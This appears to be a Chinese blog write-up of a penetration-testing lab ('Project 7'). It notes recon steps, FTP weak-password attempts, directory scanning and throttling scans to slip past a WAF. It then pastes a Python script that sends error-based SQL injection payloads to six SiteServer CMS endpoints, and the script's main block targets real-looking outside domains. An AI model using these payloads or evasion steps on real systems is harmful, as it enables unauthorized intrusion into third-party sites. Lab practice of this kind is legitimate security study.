项目7
信息收集
ip 查询
端口查询
web 渗透
可以尝试使用ip 反查查域名,可以得到域名是 www.moonlab.com
修改host 文件
21 端口
尝试一下弱口令
尝试一下anonymous 登录
80
访问80
尝试爆破目录
没有啥价值
发现可能存在webdav 提权漏洞
发现存在waf
可能存在安全狗,然后因为扫描目录的速率过大,导致被封锁了
可以降低线程数量
添加sleep 时间
通过目录扫描获取了siteserver
尝试弱密码 -> 失败
获取nday
在github 上发现一个检测脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name:siteserver最新版3.6.4 sql inject漏洞大礼包of 1
#Refer:http://www.wooyun.org/corps/%E7%99%BE%E5%AE%B9%E5%8D%83%E5%9F%9F%E8%BD%AF%E4%BB%B6%E6%8A%80%E6%9C%AF%E5%BC%80%E5%8F%91%E6%9C%89%E9%99%90%E8%B4%A3%E4%BB%BB%E5%85%AC%E5%8F%B8/page/2
def assign(service,arg):
if service=="siteserver":
return True,arg
def audit(arg):
ps=[
'siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',
'usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',
'siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',
'siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',
'siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',
'siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',
]
for p in ps:
url=arg+p
code,head,res,errcode,_=curl.curl2(url)
if code==500 and "GAOJIMicrosoft" in res:
security_hole(url)
if __name__=="__main__":
from dummy import *
audit(assign('siteserver','http://www.plhgyy.com/')[1])
#audit(assign('siteserver','http://www.zgktws.com/')[1])尝试使用go 进行重构
项目7
https://tsy244.github.io/2024/06/27/靶场记录/项目7/